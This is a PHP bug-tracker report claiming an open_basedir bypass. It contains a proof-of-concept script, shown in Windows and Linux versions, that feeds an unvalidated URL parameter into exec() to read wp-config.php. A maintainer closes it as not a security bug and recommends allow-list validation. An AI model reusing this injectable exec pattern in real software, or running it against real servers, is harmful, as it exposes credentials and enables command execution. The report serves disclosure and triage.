PHP :: Sec Bug #81715 :: Apache + PHP <= 8.1.4 open

Sec Bug #81715	Apache + PHP <= 8.1.4 open_basedir bypass‏‏
Submitted:	2022-04-06 19:14 UTC	Modified:	2022-04-07 09:46 UTC
From:	phpforwork at gmail dot com	Assigned:	cmb (profile)
Status:	Not a bug	Package:	*Directory/Filesystem functions
PHP Version:	8.1.4	OS:	Linux/Windows
Private report:	No	CVE-ID:	None

View Add Comment Developer Edit

Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.

php.net Username: php.net Password:

Quick Fix:	(description)
	Block user comment
Status:		Assign to:
Package:
Bug Type:
Summary:
From:	phpforwork at gmail dot com
New email:
PHP Version:		OS:

New/Additional Comment:

[2022-04-06 19:14 UTC] phpforwork at gmail dot com

Description:
------------
Description:
=============
open_basedir security feature can be bypassed and read the file outside the open_basedir path.


Proof of Concept
================
0. The target file you want to read C:/xampp/htdocs/wp-config.php
1. Set open_basedir as a security feature in php.ini file :
open_basedir = C:/xampp/htdocs/test
2. Make a PHP script, "bypass.php" inside folder *test* :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("type ".$dir->getRealPath()." > result.txt"));
?>
for Linux webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("cat ".$dir->getRealPath()." > result.txt"));
?>
3. Call the script :
curl localhost/test/bypass.php?file=../wp-config.php
4. You will see the full content of the file here : result.txt

Tested with PHP 5.6.3 and 7.x. and 8.x.
=====================

Reported by : Saleh 0xHunter ( twitter.com/0xhunter )

Test script:
---------------
For Windows webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("type ".$dir->getRealPath()." > result.txt"));
?>
for Linux webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("cat ".$dir->getRealPath()." > result.txt"));
?>

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2022-04-07 09:46 UTC] cmb@php.net

-Status: Open +Status: Not a bug -Assigned To: +Assigned To: cmb

[2022-04-07 09:46 UTC] cmb@php.net

From the PHP manual[1]:

| open_basedir is just an extra safety net, that is in no way
| comprehensive, and can therefore not be relied upon when security
| is needed.

Consequently, our security classification[2] doesn't regard
open_basedir bypasses as security issues.

External programs just don't know about open_basedir.  For several
reasons, user input that is passed to any of the program execution
functions needs to be thoroughly validated by the userland script;
in this case you want to introduce some allow-list and verify that
the supplied path is in that list, and otherwise reject the
request.

[1] <https://www.php.net/manual/en/ini.core.php#ini.open-basedir>
[2] <https://wiki.php.net/security>

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Fri Apr 19 16:01:27 2024 UTC